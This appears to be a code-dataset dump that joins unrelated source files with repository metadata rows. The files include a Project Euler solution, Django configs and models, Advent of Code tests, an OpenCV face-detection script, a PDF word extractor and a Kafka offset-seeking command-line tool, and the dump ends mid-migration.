class ListIndex(Document, BarbadosIndex):
id = Text(analyzer='whitespace', search_analyzer='whitespace')
display_name = Text()
items = Object(ListItemIndex, multi=True)
class Index(BaseIndex):
name = 'list'
| [
"grant@grantcohoe.com"
] | grant@grantcohoe.com |
53061cd44e7f3bced6aaee1075f33dc0e2c60688 | 186f8d649bdbf81015686fcbdab17846fefce610 | /luke/problem-017.py | 671beaa61499700fdc9c42affefa07d95b7be4f1 | [] | no_license | toastdriven/euler | 6f945e3ca3775551f97684c3471d3fb5f7dbfc85 | e1b63827b257c41511ae48fc727321a1deac5f50 | refs/heads/master | 2016-09-01T21:21:44.745350 | 2008-04-18T14:02:25 | 2008-04-18T14:02:25 | 12,409 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,401 | py | #!/usr/bin/env python
# http://projecteuler.net/index.php?section=problems&id=17
import math
from EulerLibs import MathLibs
def strOfNum(x):
    """Spell out 1 <= x <= 1000 in words, matching the original quirky
    spacing (no space between tens and units, e.g. 'fortytwo')."""
    # Work least-significant digit first.
    digits = str(x)[::-1]
    words = ''
    place = 1
    while place < 10 ** len(digits):
        jump_tens = False
        if place == 1:
            # Teens consume both the ones and the tens digit at once.
            if len(digits) > 1 and int(digits[1]) == 1:
                names = ['ten', 'eleven', 'twelve', 'thirteen', 'fourteen', 'fifteen', 'sixteen', 'seventeen', 'eighteen', 'nineteen']
                jump_tens = True
            else:
                names = ['', 'one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine']
        elif place == 10:
            names = ['', '', 'twenty', 'thirty', 'forty', 'fifty', 'sixty', 'seventy', 'eighty', 'ninety']
        elif place == 100:
            # "and" is only written when a tens/units part follows.
            if int(digits[0]) == 0 and int(digits[1]) == 0:
                names = ['', 'one hundred', 'two hundred', 'three hundred', 'four hundred', 'five hundred', 'six hundred', 'seven hundred', 'eight hundred', 'nine hundred']
            else:
                names = ['', 'one hundred and', 'two hundred and', 'three hundred and', 'four hundred and', 'five hundred and', 'six hundred and', 'seven hundred and', 'eight hundred and', 'nine hundred and']
        elif place == 1000:
            names = ['', 'one thousand']
        words = names[int(digits[int(math.log10(place))])] + words
        place *= 100 if jump_tens else 10
    return words
s = ''
# Spell out every number from 1 to 1000 and concatenate the words.
for i in range(1,1001):
	s += strOfNum(i)
# Project Euler 17 counts letters only, so strip the spaces.
s = s.replace(' ', '')
print s
answer = len(s)
print answer | [
"luke@735d8fd3-3d48-0410-ad09-b9318371deed"
] | luke@735d8fd3-3d48-0410-ad09-b9318371deed |
0b6430db3e092ad872d042c9a786f6e2a1997611 | 92164fc94078db110c92e93477075b8e22179386 | /posts/urls.py | 54b433c01f3c6bad9560425289f416243bd45c18 | [] | no_license | jang-1996/hacker | 6be9271b7f3e6f98273bf1b87d95d9858bca2bf9 | 388065be7290f1a7cec0fe937dd66d86948e3b1d | refs/heads/master | 2022-12-19T06:10:49.338535 | 2020-09-23T10:37:33 | 2020-09-23T10:37:33 | 285,253,211 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 725 | py | from django.urls import path
from .views import *
# URL namespace: reverse with e.g. "posts:main".
app_name = "posts"
urlpatterns = [
    # Post CRUD.
    path('new/', new, name="new"),
    path('create/', create, name="create"),
    path('', main, name="main"),
    path('<int:id>/', show, name="show"),
    path('update/<int:id>/',update, name="update"),
    path('delete/<int:id>/',delete, name="delete"),
    # Comments and likes on a single post.
    path('<int:post_id>/create_comment', create_comment, name="create_comment"),
    path('<int:post_id>/post_like', post_like, name="post_like"),
    path('like_list/', like_list, name="like_list"),
    # Misc pages.
    path('love/',love, name="love"),
    path('write/',write, name="write"),
    path('follower/',follower, name="follower"),
    path('following/',following, name="following"),
] | [
"altu1996@naver.com"
] | altu1996@naver.com |
e7179ac72e224f97936b67a9d09b4f3507a5dcd3 | 42074b20436f11063a04ca8fb9d9e9415c3cb86f | /test/test_solutions.py | 25f095ea1c82c6d6397a06e21b64b415fedc0706 | [] | no_license | dixonalex/advent | 323fbe6939bc5c7a60b2c02269706366ed57c575 | 732e3697effbc580f03d080c14a3422e940dc043 | refs/heads/master | 2020-04-09T02:56:04.136891 | 2018-12-03T14:06:33 | 2018-12-03T14:06:33 | 159,960,677 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,173 | py | import inject
import pytest
from advent import Config, Claim
from advent.solutions import Solutions
class TestSolutions:
    """pytest suite for the Advent of Code 2018 day 1-3 solutions.

    The autouse fixture writes the example puzzle inputs to temp files and
    rebinds Config through the `inject` container, so Solutions reads them
    as if they were the real input files.
    """
    @pytest.fixture()
    def frequencies(self) -> [str]:
        """The example input from advent of code 2018 day 1"""
        return [1, -2, 3, 1]
    @pytest.fixture()
    def ids(self) -> [str]:
        """The example input from advent of code 2018 day 2"""
        return ["abcdef", "bababc", "abbcde", "aacccd", "abcdee", "ababab"]
    @pytest.fixture()
    def claims(self) -> [str]:
        """Day 3"""
        return ["#1 @ 1,3: 4x4", "#2 @ 3,1: 4x4", "#3 @ 5,5: 2x2"]
    @pytest.fixture(autouse=True)
    def setup(self, tmpdir, frequencies, ids, claims):
        # One temp file per day, then rebind Config to point at them.
        p = tmpdir.join("day_1.txt")
        p.write("\n".join([str(f) for f in frequencies]))
        p2 = tmpdir.join("day_2.txt")
        p2.write("\n".join(ids))
        p3 = tmpdir.join("day_3.txt")
        p3.write("\n".join(claims))
        def configure(binder):
            cfg = Config(day_1=p.strpath, day_2=p2.strpath, day_3=p3.strpath)
            binder.bind(Config, cfg)
        inject.clear_and_configure(configure)
    def test_day_1(self):
        """
        input of [+1, -2, +3, +1] would result in
        0 + 1 -> 1
        1 + -2 -> -1
        -1 + 3 -> 2
        2 + 1 -> 3
        """
        # Arrange
        sut = Solutions()
        # Act
        part_1, part_2 = sut.day_1()
        # Assert
        assert part_1 == 3
        assert part_2 == 2
    def test_day_2(self):
        """Checksum 12 and common letters 'abcde' for the day-2 example."""
        # Arrange
        sut = Solutions()
        # Act
        part_1, part_2 = sut.day_2()
        # Assert
        assert part_1 == 12
        assert part_2 == "abcde"
    def test_day_3_claim(self):
        """Claim.from_elf parses '#id @ left,top: WxH' elf notation."""
        # Arrange
        line = "#1 @ 429,177: 12x27"
        # Act
        claim = Claim.from_elf(line)
        # Assert
        assert claim.id == 1
        assert claim.from_left == 429
        assert claim.from_top == 177
        assert claim.width == 12
        assert claim.height == 27
    def test_day_3(self):
        """Four square inches overlap in the day-3 example claims."""
        # Arrange
        sut = Solutions()
        # Act
        part_1, part_2 = sut.day_3()
        # Assert
        assert part_1 == 4
| [
"alexanderldixon@gmail.com"
] | alexanderldixon@gmail.com |
e1bb0795b99caf9bd0e6effbaf3c0a068848378b | 12b7dc1d608b0deca429485493482afca5f99736 | /app/config/settings/dev.py | 8f40045b1ceefb621445b8de6efa70ce96e82c8e | [] | no_license | Ryanden/EB-Docker-Deploy2-practice- | 3c147786ccb6567c8e325ac79527052a15152a4a | 4e12f4e35da6d26979b6915165227f9167c507d5 | refs/heads/master | 2022-12-09T09:37:51.404751 | 2019-05-16T05:04:15 | 2019-05-16T05:04:15 | 142,002,119 | 0 | 0 | null | 2022-12-08T02:36:17 | 2018-07-23T10:58:30 | Python | UTF-8 | Python | false | false | 369 | py | from .base import *
secrets = json.load(open(os.path.join(SECRETS_DIR, 'dev.json')))
DEBUG = True
INSTALLED_APPS += [
'storages',
'django_extensions'
]
DEFAULT_FILE_STORAGE = 'config.storages.S3DefaultStorage'
AWS_STORAGE_BUCKET_NAME = secrets['AWS_STORAGE_BUCKET_NAME']
WSGI_APPLICATION = 'config.wsgi.dev.application'
DATABASES = secrets['DATABASES']
| [
"lockstom@gmail.com"
] | lockstom@gmail.com |
77bba00ea88f7a1031c39acdd7dd923c5df2690f | a1a3c2a5eda041ed519a8102a0317c4468fe9571 | /app/models.py | bbb08b505e7f124311bc554c0385562859a8093d | [] | no_license | marwadesouky96/Fictionfone | f24eacc8e942cb0366fe6f7d8c5b8c4ba6c4c9ac | beeb46e4f5294fe50c6ad2076f8026562b76b1fe | refs/heads/master | 2020-04-01T10:52:19.616761 | 2018-10-15T15:48:14 | 2018-10-15T15:48:14 | 153,135,309 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 346 | py | from django.db import models
# # Create your models here.
# class User(models.Model):
# title = models.CharField(max_length=200)
# text = models.TextField(max_length=200)
class Tweet(models.Model):
    """A captured tweet; every field is stored as plain text."""
    # presumably the upstream tweet id, kept as a string -- confirm
    _id = models.CharField(max_length=100)
    text = models.CharField(max_length=400)
    # creation timestamp as returned upstream (not parsed to DateTimeField)
    created_at = models.CharField(max_length=400)
| [
"marwadesouky96@gmail.com"
] | marwadesouky96@gmail.com |
d20bfefcbb689e95a0e699712752808cee0aabd1 | 5966449d2e29c9b64351895db2932f94f9de42da | /catkin_ws/build/calibration_common/catkin_generated/pkg.develspace.context.pc.py | 74b3622b6da1649f18d3cf518a907cdaf2f04265 | [] | no_license | godaeseong/GoHriProject | 8cbce6934485b8ba3253fc7b6c5b5b59397b4518 | 425e70b7c91b6215f5477fc2250d2b0ac96577be | refs/heads/master | 2021-05-11T22:11:56.099580 | 2018-01-15T02:20:43 | 2018-01-15T02:20:43 | 117,484,817 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 613 | py | # generated from catkin/cmake/template/pkg.context.pc.in
# Auto-generated catkin pkg-config context; values are substituted by CMake.
CATKIN_PACKAGE_PREFIX = ""
# Include dirs exported to dependents (package headers + Eigen3).
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/hri/catkin_ws/src/calibration_toolkit/calibration_common/include;/usr/include/eigen3".split(';') if "/home/hri/catkin_ws/src/calibration_toolkit/calibration_common/include;/usr/include/eigen3" != "" else []
PROJECT_CATKIN_DEPENDS = "cmake_modules;image_geometry".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "calibration_common"
PROJECT_SPACE_DIR = "/home/hri/catkin_ws/devel/.private/calibration_common"
PROJECT_VERSION = "1.0.0"
| [
"bigdream0129@naver.com"
] | bigdream0129@naver.com |
8bca0fd28edf3e166cd6045cafd32ca1e2967550 | e10551916a2dfc6f8fdbdece8e2b45d82f249bc1 | /document_service/app/file_format/pdf.py | 19464dcc4d58ccc4280522ac3d04339ba441992f | [] | no_license | overmesgit/cogent | 71367836583a8544fbd3d8fc946a7b5134cf5f3a | 90c68853ffd929c5be76b9bb383330b74595e5e0 | refs/heads/master | 2023-08-15T18:38:38.646959 | 2021-10-11T03:20:19 | 2021-10-11T03:20:19 | 414,568,002 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 637 | py | import io
import logging
import re
from pdfminer.high_level import extract_text, extract_pages
from app.file_format.base import BaseFileProcessor
logger = logging.getLogger(__name__)
class PdfProcessor(BaseFileProcessor):
    """Extracts words from PDF bytes and validates that bytes are a PDF."""
    file_format = 'pdf'

    def get_file_text(self, file_data):
        """Return all words of 3+ word-characters found in the PDF text."""
        text = extract_text(io.BytesIO(file_data))
        return re.findall(r'\b\w{3,}\b', text)

    def is_valid_file(self, file_data):
        """True when pdfminer can parse at least one of the first 3 pages."""
        try:
            return bool(list(extract_pages(io.BytesIO(file_data), maxpages=3)))
        except Exception as ex:
            # Any parser failure means "not a usable PDF"; log and reject.
            logger.error('ProcessDocumentError %s', ex)
            return False
| [
"artem.bezu@localfolio.co.jp"
] | artem.bezu@localfolio.co.jp |
5b45426a98f48b6df3c7db5796b3064dcddce4fd | 65a9fe205fdac081cd765fbc8a29c4beab6fbfb8 | /tests/test_attribute_creator.py | b28cd492b4b64123e840b70983d2709d9cbf1000 | [] | no_license | Slave1488/xmldoc2html | 19e36021437e4f24d4241f424e8db09e146157ca | b14207b397d5699e03a457f953eb7fcf546ca617 | refs/heads/master | 2020-08-01T02:23:58.234303 | 2019-11-14T10:52:57 | 2019-11-14T10:52:57 | 210,827,745 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 527 | py | import unittest
import sys
import os
try:
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)),
os.path.pardir))
from layout import attributecreator
except Exception:
print('Module is missing!')
exit(1)
class TestAttributeCreator(unittest.TestCase):
    def test(self):
        """create_class should build a 'class' attribute with the given value."""
        attr = attributecreator.create_class('class_value')
        self.assertEqual((attr._name, attr._value), ('class', 'class_value'))


if __name__ == "__main__":
    unittest.main()
| [
"blue101blower@gmail.com"
] | blue101blower@gmail.com |
6c191364901cf72b6e7ec942af7f4fc7c333ad1a | fc353b0433348ff58841cf32bf1f5e594e037513 | /leetcode/830.py | 8c5023a11d45ce74865a0054c858b8aaa012615c | [] | no_license | TrellixVulnTeam/Demo_933I | ce759ec52dd191f99b998862f4aba7971878ba37 | ab662060eb07a88a48c9832e09bf268517c1a3fa | refs/heads/master | 2023-04-27T16:55:29.627491 | 2021-05-07T05:38:58 | 2021-05-07T05:38:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 230 | py | from graphics import *
import math
spriaal = GraphWin("Joonistus", 1000, 1000)
a = 5
b = 4
# NOTE(review): this loop is broken as written and needs its intent clarified:
#  - math.pi is a constant, not callable, so math.pi() raises TypeError
#  - math.sin() is missing its argument
#  - neither a nor b ever changes, so the loop would never terminate
while True:
    x = math.sin(a + math.pi() / 2)
    y = math.sin()
    pt = Point(x + 500, y + 500)
    pt.draw(spriaal)
| [
"1149061045@qq.com"
] | 1149061045@qq.com |
a383f3d07eb6e2379f905933f9769e7f3aeeb0f4 | 3f0ce0e81331667681ac0f321e8e51737220e474 | /MadLibs2/venv/Scripts/pip-script.py | 1f1c45b3b9e6908be9f37c7f27b3742cefe13698 | [] | no_license | Dominic-Perez/CSE | b75cf225fd38af67e306558bafab2d8e9336e95c | 5dac686c32e5a0e8690d775b40b9351205dfa91d | refs/heads/master | 2020-04-02T10:37:28.123642 | 2019-05-06T15:44:14 | 2019-05-06T15:44:14 | 154,347,369 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 416 | py | #!C:\Users\hg65\Documents\Github\CSE\MadLibs2\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip'
# Auto-generated setuptools console-script wrapper for pip; do not edit.
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point

if __name__ == '__main__':
    # Strip the wrapper suffix ("-script.py"/".exe") so pip sees its own name.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('pip==10.0.1', 'console_scripts', 'pip')()
    )
| [
"42383380+Dominic-Perez@users.noreply.github.com"
] | 42383380+Dominic-Perez@users.noreply.github.com |
0474c7ac7fcab24e97fcd8a5d1fc67dd45461b2f | 3a476e0de377d1580facbfd78efdfbca009ed7a3 | /uct_test.py | 403c551b8a4100fa685aca7eda34a6d39cf067a1 | [
"MIT"
] | permissive | liuruoze/Thought-SC2 | b7366186dbb4494fabdb3e0104354665e21ff707 | b3cfbeffbfa09b952c596805d2006af24613db2d | refs/heads/master | 2023-04-28T11:47:56.771797 | 2021-01-15T00:25:26 | 2021-01-15T00:25:26 | 296,185,180 | 4 | 2 | MIT | 2023-04-24T09:06:48 | 2020-09-17T01:17:04 | Python | UTF-8 | Python | false | false | 1,300 | py | USED_DEVICES = "6,7"
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = USED_DEVICES
from uct.numpy_impl import *
import tensorflow as tf
from prototype.dynamic_network import DynamicNetwork
from prototype.hier_network import HierNetwork
def test(is_restore_policy=True, is_restore_dynamic=True):
    """Run one timed UCT search against the saved networks.

    is_restore_policy -- reload the saved policy network weights
    is_restore_dynamic -- reload the saved dynamics model weights
    """
    # train model
    config = tf.ConfigProto(
        allow_soft_placement=True, log_device_placement=False,
    )
    # Grow GPU memory on demand instead of reserving it all up front.
    config.gpu_options.allow_growth = True
    sess = tf.Session(config=config)
    hier_net = HierNetwork(sess, policy_path='./model/20181217-154646/probe')
    hier_net.initialize()
    if is_restore_policy:
        hier_net.restore_policy()
    policy_net = PolicyNetinMCTS(hier_net)
    dynamic_model_path = './model/20181223-174748_dynamic/probe'
    if is_restore_dynamic:
        hier_net.restore_dynamic(dynamic_model_path)
    dynamic_net = hier_net.dynamic_net
    # Time num_reads UCT simulations from the initial game state.
    num_reads = 100
    import time
    tick = time.time()
    print(UCT_search(GameState(dynamic_net), num_reads, policy_net))
    tock = time.time()
    print("Took %s sec to run %s times" % (tock - tick, num_reads))
    #import resource
    #print("Consumed %sB memory" % resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)


if __name__ == "__main__":
    test()
| [
"liuruoze@163.com"
] | liuruoze@163.com |
92897292184e26ebd90bb1e76081390a112ec8b1 | de38c422ffaad6b4fb32cf00df5cd806a98b4e3b | /opencv_item/face_detection.py | 39cf0f4277274d4a588dff859e07252c6187a859 | [] | no_license | Vimal06Pal/opencv | 291ce2e07dc92dd4f537c5884046536ae7ceeda9 | 46fa1162b5fcb8fa4f9d7a7b43ce75dd9175f4f9 | refs/heads/master | 2022-11-12T08:20:28.671256 | 2020-06-27T12:16:07 | 2020-06-27T12:16:07 | 270,771,849 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,196 | py | import cv2
# Haar cascade models for frontal faces and eyes (shipped with OpenCV).
face_cascade = cv2.CascadeClassifier('./data/Haarcascades/haarcascade_frontalface_default.xml')
eye_cascade = cv2.CascadeClassifier('./data/Haarcascades/haarcascade_eye.xml')
# print(face_cascade)
img = cv2.imread('./data/Modi.jpg')
img = cv2.resize(img,(512,512))
# Cascade detection works on grayscale input.
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
# Args: scaleFactor=1.1, minNeighbors=5.
faces = face_cascade.detectMultiScale(gray, 1.1, 5)
eyes = eye_cascade.detectMultiScale(gray, 1.1, 5)
'''
objects = cv2.CascadeClassifier.detectMultiScale(image,ScaleFactor,
MinNeighbours)
image = Matrix of the type cv_8U containing an image where objects
are detected.
objects = vector of rectangles where each rectangle contains the detected object,
the rectangle may be partially outside the original image.
scaleFactor = Parameter specifiying how much the image
size is reduced at each image scale
minNeighbours = Parameter specifying how many neighbours each candidate
rectangle should have to retain it.
'''
# Draw a box around each detection.  NOTE(review): the eye loop is nested
# inside the face loop, so every eye rectangle is redrawn once per face.
for (x,y,w,h) in faces:
    cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),3)
    for (xe,ye,we,he) in eyes:
        cv2.rectangle(img,(xe,ye),(xe+we,ye+he),(255,0,0),2)
cv2.imshow('img',img)
cv2.waitKey(0) | [
"noreply@github.com"
] | Vimal06Pal.noreply@github.com |
7d3b75ff56ceeaf5df5be51a28d10e2ea4da6bcf | a4896e2cfc73b842eb1b246a4106f298a5e39db3 | /kfk_data_seeker.py | 76a5200724d51ae1f7f6224331af18e28a62b0d0 | [] | no_license | gooa1c2e3/kfk_data_seeker | 7ab250f9604de21a5cd8131fc244f915942ebf6b | 0e2e7a047faf872a59da422c85e7c4c21e83a282 | refs/heads/master | 2021-08-24T03:59:19.430521 | 2017-12-08T00:34:29 | 2017-12-08T00:34:29 | 113,512,741 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,696 | py | # Company: CHT-PT
# Author: Chien-Yu Chen
# Date: 2017/11/23
# Mail: gooa1c2e3@gmail.com
# Support: Python 2.7
from sys import exit as _exit
from argparse import ArgumentParser
import time
from datetime import datetime
from collections import namedtuple
import traceback
try:
from kafka import KafkaConsumer
from kafka import TopicPartition
from kafka.common import CommitFailedError
from kafka.common import KafkaTimeoutError
from kafka.common import NoBrokersAvailable
except ImportError as e:
print "Error: Can not find kafka-python module, exit"
_exit(1)
__version__ = "0.0.1_py27"
def _get_parser():
""" To parse arguments from command line input """
class Options:
def __init__(self):
self._parser = self.__init__parser()
def __init__parser(self):
_usage = """Input topic and datetime, seeker could find data on kafka.
Datetime string format: YYYY-MM-DDThh:mm:ss, eg.1970-01-01T00:00:00
"""
_parser = ArgumentParser(description=_usage)
_parser.add_argument(
'-s', '--start',
help="Input datetime, it is necessary argument.",
action="store",
dest='start'
)
_parser.add_argument(
'-t', '--topic',
help='Input topic, it is necessary argument.',
action="store",
dest='topic'
)
_parser.add_argument(
'-d', '--debug',
help=""" Show exception traceback infomation """,
action="store_true",
dest='debug'
)
_parser.add_argument(
'-S', '--Seek',
help="""Change the maximum number of data to seek & poll,
3 was set by default.
If -1 was set, unlimited mode will be turn on,
seeker will try to poll all data from given offset by batches,
the maximum batch szie is 4000.""",
action="store",
type = int,
dest='seek'
)
_parser.add_argument(
'-f', '--filepath',
help='Save polled data to the given file.',
action="store",
dest='filepath'
)
_parser.add_argument(
'-F', '--offset',
help="""Instead of the offset by input datetime,
the offset of this argument would be used to poll data.""",
action="store",
type = int,
dest='offset'
)
_parser.add_argument(
'-p', '--partition',
help='Input partition, 0 was set by default.',
action="store",
type = int,
dest='partition'
)
_parser.add_argument(
'-b', '--brokers',
help="""Input broker list, it is necessary argument.
For example: 192.168.1.1:9091,192.168.1.5:9090 """,
action="store",
dest='brokers'
)
_parser.add_argument(
'-o', '--output_basic_info',
help=""" Print basic information. """,
action="store_true",
dest='output'
)
_parser.add_argument(
'-v', '--version',
help='show version',
action="version",
version='version= {}'.format(__version__)
)
return _parser
option = Options()
return option._parser
class Seeker():
""" Datetime string format: '%Y-%m-%dT%H:%M:%S'
eg. 2017-12-01T12:31:54 for 2017/12/01 12:31:54
"""
def __init__(
self,
start_datetime,
topic,
brokers=None,
partition=None,
seek_num=3,
path=None,
force=None,
):
self._partition = 0
#self._brokers = ["192.168.1.189:9092"]
self._beginning_data = None
self._last_data = None
self._CR_namedtp = namedtuple(
'ConsumerRecord',
['topic', 'partition', 'offset', 'timestamp','value']
)
if start_datetime:
try:
self._start_datetime = self._to_datetime_obj(start_datetime)
self._start_timestamp = self.datetime2timestamp(start_datetime)
except ValueError as e:
print "{} is not match format YYYY-MM-DDThh:mm:ss".format(start_datetime)
_exit(1)
else:
print "Must input the argument: -s start_datetime"
_exit(1)
if topic:
self._topic = topic
else:
print "Must input the argument: -t topic"
_exit(1)
if partition:
self._partition = self._parse_partition_string(partition)
if brokers:
self._brokers = self._parse_broker_string(brokers)
else:
print "Must input the argument: -b brokers"
_exit(1)
if seek_num:
self._seek_num = seek_num
else:
self._seek_num = 3
if path:
self.file_path = path
else:
self.file_path = None
if force:
self._force_offset = force
else:
self._force_offset = None
self._data = None
self._toparty = TopicPartition(self.topic, self._partition)
def seek_and_poll(self):
""" Wrap KafkaConsumer.seek & poll function"""
try:
if self._force_offset:
print "Using -f offset: {}".format(self._force_offset)
_tmp_offset = self._force_offset
self._start_offset = None
else:
_tmp = self.get_offset(self._start_timestamp)
self._start_offset = _tmp[self._toparty].offset
print "Using datetime to offset: {}".format(self._start_offset)
_tmp_offset = self._start_offset
self._consumer.seek(self._toparty, _tmp_offset)
if self._seek_num > -1:
self._data = self._consumer.poll(timeout_ms=3000, max_records=self._seek_num)
try:
_batch = self._data.values()[0]
_batch_size = len(_batch)
except IndexError as e:
_batch = None
_batch_size = 0
print "Polled batch size: {}".format(_batch_size)
if _batch:
if self.file_path:
if _batch_size > 0:
self._dump_to_file(mode='w', batch=_batch)
else:
print "No data to dump"
else:
self._print_record(_batch)
else:
print "offset: {} Data: None".format(_tmp_offset)
elif self._seek_num==-1:
print "seek num was set in -1, turn on unlimited mode, task start:"
self._no_data_can_be_polled = False
while not self._no_data_can_be_polled:
self._data = self._consumer.poll(timeout_ms=3000, max_records=4000)
try:
_batch = self._data.values()[0]
_batch_size = len(_batch)
except IndexError as e:
break
print "Polled batch size: {}".format(_batch_size)
if _batch_size==0:
self._no_data_can_be_polled = True
print "The task is finished"
break
else:
if self.file_path:
self._dump_to_file(mode='a', batch=_batch)
else:
self._print_record(_batch)
time.sleep(0.5)
else:
print "Illegal seek number was found: {}, exit".format(self._seek_num)
_exit(1)
except KafkaTimeoutError as e:
print str(e)
_exit(1)
except NoBrokersAvailable as e:
print str(e)
_exit(1)
def connect_borkers(self):
try:
print "Connecting to kafka brokers: {}...".format(self._brokers),
self._consumer = KafkaConsumer(bootstrap_servers=self._brokers)
self.assign_topic()
except NoBrokersAvailable as e:
print str(e)
print "Failed, exit"
_exit(1)
print "Succeed"
def reconnect_brokers(self):
self.close()
self.connect_borkers()
def assign_topic(self):
try:
self._consumer.assign([self._toparty])
self.seek_beginning_offset()
self.seek_last_offset()
except ValueError:
print "Connection maybe closed, can not assign topic"
def _print_record(self, batch):
for _record in batch:
print "Offset:", _record.offset, ", Data:", _record.value
def _dump_to_file(self, mode, batch):
print "Dump data to {}...".format(self.file_path),
try:
with open(self.file_path, mode) as f:
for _record in batch:
f.write(_record.value + "\n")
except Exception as e:
print "Failed"
print str(e)
print "Done"
def seek_last_offset(self):
self._consumer.seek_to_end(self._toparty)
self._last_data = self._consumer.poll(timeout_ms=3000, max_records=1)
def seek_beginning_offset(self):
self._consumer.seek_to_beginning(self._toparty)
self._beginning_data = self._consumer.poll(timeout_ms=3000, max_records=1)
def _to_datetime_obj(self, datetime_string):
return datetime.strptime(datetime_string, "%Y-%m-%dT%H:%M:%S")
@property
def file_path(self):
return self.file_path
@property
def fource(self):
return self._force_offset
@property
def start_datetime(self):
""" The start datetime in seeking data protcol"""
return self._start_datetime
@start_datetime.setter
def set_start_datetime(self, datetime):
try:
self._start_datetime = self._to_datetime_obj(datetime)
self._start_timestamp = self.datetime2timestamp(datetime)
except ValueError as e:
print "{} is not match format YYYY-MM-DDThh:mm:ss".format(datetime)
@property
def seek_num(self):
return self._seek_num
@property
def start_timestamp(self):
return self._start_timestamp
@property
def start_offset(self):
return self._start_offset
@property
def topic(self):
return self._topic
@property
def beginning_data(self):
if self._beginning_data is None:
self.seek_beginning_offset()
if self._beginning_data == {}:
return self._CR_namedtp(
topic=self._topic,
partition=self._partition,
timestamp=None,
value=None,
offset=None
)
return self._beginning_data[self._toparty][0]
@property
def last_data(self):
if self._last_data is None:
self.seek_last_offset()
if self._last_data == {}:
return self._CR_namedtp(
topic=self._topic,
partition=self._partition,
timestamp=None,
value=None,
offset=None
)
return self._last_data[self._toparty][0]
@topic.setter
def set_topic(self, topic):
self._topic = topic
self._toparty = TopicPartition(self.topic, self._partition)
self.assign_topic()
@property
def brokers(self):
return self._brokers
@brokers.setter
def set_brokers(self, brokers):
self._brokers = self_parse_broker_string(brokers)
self.reconnect_brokers()
def _parse_broker_string(self, brokers):
if isinstance(brokers, list):
return borkers
elif isinstance(brokers, str):
return [broker.strip() for broker in brokers.split(',')]
@property
def partition(self):
return self._partition
@partition.setter
def set_partition(self, partition):
self._partition = self._parse_partition_string(partition)
self._toparty = TopicPartition(self.topic, self._partition)
self.assign_topic()
def _parse_partition_string(self, partition):
if isinstance(partition, int):
return partition
elif isinstance(partition, str):
try:
return int(partition)
except ValueError as e:
print "Invalid partition string was found: {}".format(partition)
def datetime2timestamp(self, datetime_string):
time_tuple = time.strptime(datetime_string, "%Y-%m-%dT%H:%M:%S")
return time.mktime(time_tuple)
def get_offset(self, _timestamp):
try:
print "To get offset by timpstamp: {}".format(_timestamp)
return self._consumer.offsets_for_times({self._toparty:_timestamp})
except ValueError:
print "Connection maybe closed, try to reconnect"
self.connect_borkers()
return self._consumer.offsets_for_times({self._toparty:_timestamp})
def close(self):
print "Close connection"
self._consumer.close()
if __name__=="__main__":
    parser = _get_parser()
    args = parser.parse_args()
    try:
        # Build the seeker from CLI options; Seeker exits on missing input.
        seeker = Seeker(
            start_datetime=args.start,
            topic=args.topic,
            brokers=args.brokers,
            partition=args.partition,
            seek_num=args.seek,
            path=args.filepath,
            force=args.offset
        )
        seeker.connect_borkers()
        seeker.seek_and_poll()
        seeker.close()
        if args.output:
            # -o: dump parsed inputs plus the topic/partition boundaries.
            print "\n","===== Input information ====="
            print "Input offset:", seeker.fource
            print "Input datetime:", seeker.start_datetime
            print "Input timpstamp:", seeker.start_timestamp
            print "Datetime to offset:", seeker.start_offset
            print "File path:", seeker.file_path
            print "seek number:", seeker.seek_num
            print "\n","===== Topic information ====="
            print "Brokers:", seeker.brokers
            print "Partition:", seeker.partition
            print "Topic:", seeker.topic
            print "Fisrt offset on kafka:", seeker.beginning_data.offset
            print "Last offset on kafka:", seeker.last_data.offset
    except Exception as e:
        # Top-level boundary: report, optionally with traceback (-d).
        print str(e)
        if args.debug:
            traceback.print_exc()
_exit(0) | [
"gooa1c2e3@gmail.com"
] | gooa1c2e3@gmail.com |
687cfda74396d138edf948b2b21bcf2e39fb25ea | e1881c3a562355974cb6b96f8d06cdd97dee0d1e | /tutorials/migrations/0004_auto_20190821_1430.py | b4b93a817da4f9014f79aa1cbc444bec4da676c0 | [] | no_license | codeflamer/Anonymous-Music-App | b2b7648d49dc77d94a76660b0e28a5358ba19ef5 | 406bdfde10a9afb1437febda38904cc6070c4414 | refs/heads/master | 2020-09-13T10:24:40.049738 | 2019-11-19T17:11:49 | 2019-11-19T17:12:55 | 222,741,215 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 781 | py | # Generated by Django 2.1.2 on 2019-08-21 13:30
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Add Album.user (FK to the auth user model, default pk=1) and update
    the Album.artist help text."""

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('tutorials', '0003_auto_20190820_1257'),
    ]
    operations = [
        migrations.AddField(
            model_name='album',
            name='user',
            field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
        migrations.AlterField(
